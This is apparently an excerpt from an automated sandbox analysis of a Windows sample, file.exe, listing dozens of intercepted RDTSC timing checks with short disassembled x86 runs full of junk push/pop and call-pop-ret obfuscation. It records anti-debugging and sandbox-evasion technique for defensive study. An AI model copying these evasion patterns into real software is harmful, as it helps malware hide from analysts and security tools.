                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1342038 second address: 134207B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx esi, cx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FC850CE3D38h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007FC850CE3D3Ch 0x0000002e push 00000000h 0x00000030 movzx esi, di 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134423C second address: 13442D7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC8515781ECh 0x00000008 jmp 00007FC8515781E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 mov esi, 28433736h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FC8515781D8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 sub dword ptr [ebp+122D1CCAh], edx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007FC8515781D8h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 jmp 00007FC8515781E3h 0x0000005e jmp 00007FC8515781E3h 0x00000063 popad 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD654 second address: 12FD65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD65D second address: 12FD689 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8515781D6h 0x00000008 jno 00007FC8515781D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push ebx 0x00000012 jmp 00007FC8515781E7h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD689 second address: 12FD691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD691 second address: 12FD697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13472C6 second address: 13472FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007FC850CE3D44h 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13428F1 second address: 13428FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8515781DAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13472FD second address: 1347303 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13428FF second address: 1342903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1343482 second address: 134348F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FC850CE3D36h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344012 second address: 1344016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347303 second address: 1347386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FC850CE3D38h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D314Ah], ebx 0x0000002a sub dword ptr [ebp+122D2014h], ecx 0x00000030 push 00000000h 0x00000032 jmp 00007FC850CE3D45h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FC850CE3D38h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344A42 second address: 1344A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8515781E3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344016 second address: 134402A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b js 00007FC850CE3D36h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347386 second address: 134738A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134738A second address: 13473A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13473A0 second address: 13473CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FC8515781DCh 0x00000012 jnl 00007FC8515781D6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13482DD second address: 13482E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134754A second address: 1347550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347550 second address: 1347554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347554 second address: 13475D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC8515781D8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c add bh, FFFFFFC7h 0x0000002f mov edi, ebx 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov edi, dword ptr [ebp+122D2014h] 0x0000003e mov eax, dword ptr [ebp+122D12DDh] 0x00000044 push 00000000h 0x00000046 push ebx 0x00000047 call 00007FC8515781D8h 0x0000004c pop ebx 0x0000004d mov dword ptr [esp+04h], ebx 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc ebx 0x0000005a push ebx 0x0000005b ret 0x0000005c pop ebx 0x0000005d ret 0x0000005e push FFFFFFFFh 0x00000060 mov edi, ecx 0x00000062 push ebx 0x00000063 mov dword ptr [ebp+1247A367h], eax 0x00000069 pop edi 0x0000006a push eax 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13475D8 second address: 13475DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13484A7 second address: 13484B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jc 00007FC8515781D6h 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134B44B second address: 134B46C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007FC850CE3D4Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC850CE3D3Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134B46C second address: 134B4EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007FC8515781DBh 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FC8515781D8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 sub bl, FFFFFFABh 0x0000002b push ecx 0x0000002c or ebx, 62978D69h 0x00000032 pop ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007FC8515781D8h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f mov bx, 8D8Ah 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push edi 0x00000057 jmp 00007FC8515781E4h 0x0000005c pop edi 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134A4AD second address: 134A4B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C55D second address: 134C575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC8515781E1h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C575 second address: 134C579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C579 second address: 134C5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC8515781E7h 0x0000000d nop 0x0000000e jp 00007FC8515781D9h 0x00000014 movsx edi, si 0x00000017 push 00000000h 0x00000019 pushad 0x0000001a sub ecx, dword ptr [ebp+122D1C2Ch] 0x00000020 movzx edi, dx 0x00000023 popad 0x00000024 xor dword ptr [ebp+122D326Ah], edx 0x0000002a push 00000000h 0x0000002c jmp 00007FC8515781E6h 0x00000031 ja 00007FC8515781DBh 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC8515781DDh 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C5E8 second address: 134C5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D5D7 second address: 134D631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 add edi, dword ptr [ebp+122D3680h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FC8515781D8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov dword ptr [ebp+12451E2Fh], edx 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1F33h], esi 0x00000038 xchg eax, esi 0x00000039 push edi 0x0000003a jno 00007FC8515781DCh 0x00000040 pop edi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FC8515781DAh 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C734 second address: 134C765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC850CE3D49h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C765 second address: 134C775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D7A1 second address: 134D7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC850CE3D36h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D7AC second address: 134D7BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D7BB second address: 134D7C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134F4A2 second address: 134F4D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FC8515781E2h 0x00000011 jmp 00007FC8515781DFh 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D7C1 second address: 134D860 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC850CE3D3Dh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov di, 63ABh 0x00000010 mov ebx, dword ptr [ebp+122D2247h] 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FC850CE3D38h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 jne 00007FC850CE3D38h 0x0000003d mov dword ptr [ebp+12452147h], esi 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007FC850CE3D38h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 00000017h 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 mov bx, B54Bh 0x00000068 mov ebx, 04D58935h 0x0000006d mov eax, dword ptr [ebp+122D0CD1h] 0x00000073 mov dword ptr [ebp+12459D8Eh], edx 0x00000079 push FFFFFFFFh 0x0000007b mov dword ptr [ebp+122D23AEh], edx 0x00000081 nop 0x00000082 push ebx 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D860 second address: 134D864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350541 second address: 1350545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D864 second address: 134D871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D871 second address: 134D878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135146C second address: 1351473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1351473 second address: 1351491 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC850CE3D3Ch 0x00000008 je 00007FC850CE3D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jl 00007FC850CE3D38h 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1351491 second address: 1351495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1351495 second address: 1351499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134E81E second address: 134E822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134E822 second address: 134E846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC850CE3D40h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134E846 second address: 134E84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13523B8 second address: 13523CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FC850CE3D48h 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FC850CE3D36h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13523CE second address: 13523D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13523D2 second address: 1352437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FC850CE3D38h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 add di, 7EF6h 0x00000026 add bl, 0000004Dh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FC850CE3D38h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D3554h] 0x0000004b push 00000000h 0x0000004d mov edi, dword ptr [ebp+1246199Dh] 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13532D4 second address: 13532D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13532D8 second address: 1353393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007FC850CE3D42h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FC850CE3D38h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c clc 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007FC850CE3D38h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 xor edi, dword ptr [ebp+122D3570h] 0x0000004f xchg eax, esi 0x00000050 pushad 0x00000051 pushad 0x00000052 jns 00007FC850CE3D36h 0x00000058 js 00007FC850CE3D36h 0x0000005e popad 0x0000005f jmp 00007FC850CE3D49h 0x00000064 popad 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FC850CE3D40h 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356A68 second address: 1356A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC8515781D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134F7C3 second address: 134F7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357902 second address: 1357908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357908 second address: 1357917 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357917 second address: 135791D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F7C8 second address: 135F7CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F7CE second address: 135F7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781E3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F7E5 second address: 135F7EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F92C second address: 135F930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F930 second address: 135F95B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC850CE3D36h 0x00000009 jmp 00007FC850CE3D3Eh 0x0000000e push eax 0x0000000f pop eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 jo 00007FC850CE3D38h 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F95B second address: 135F95F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364AEA second address: 1364B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC850CE3D47h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364B20 second address: 1364B3A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC8515781D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 ja 00007FC8515781D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364B3A second address: 1364B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007FC850CE3D3Ah 0x0000000b pop edi 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC850CE3D3Bh 0x00000016 rdtsc
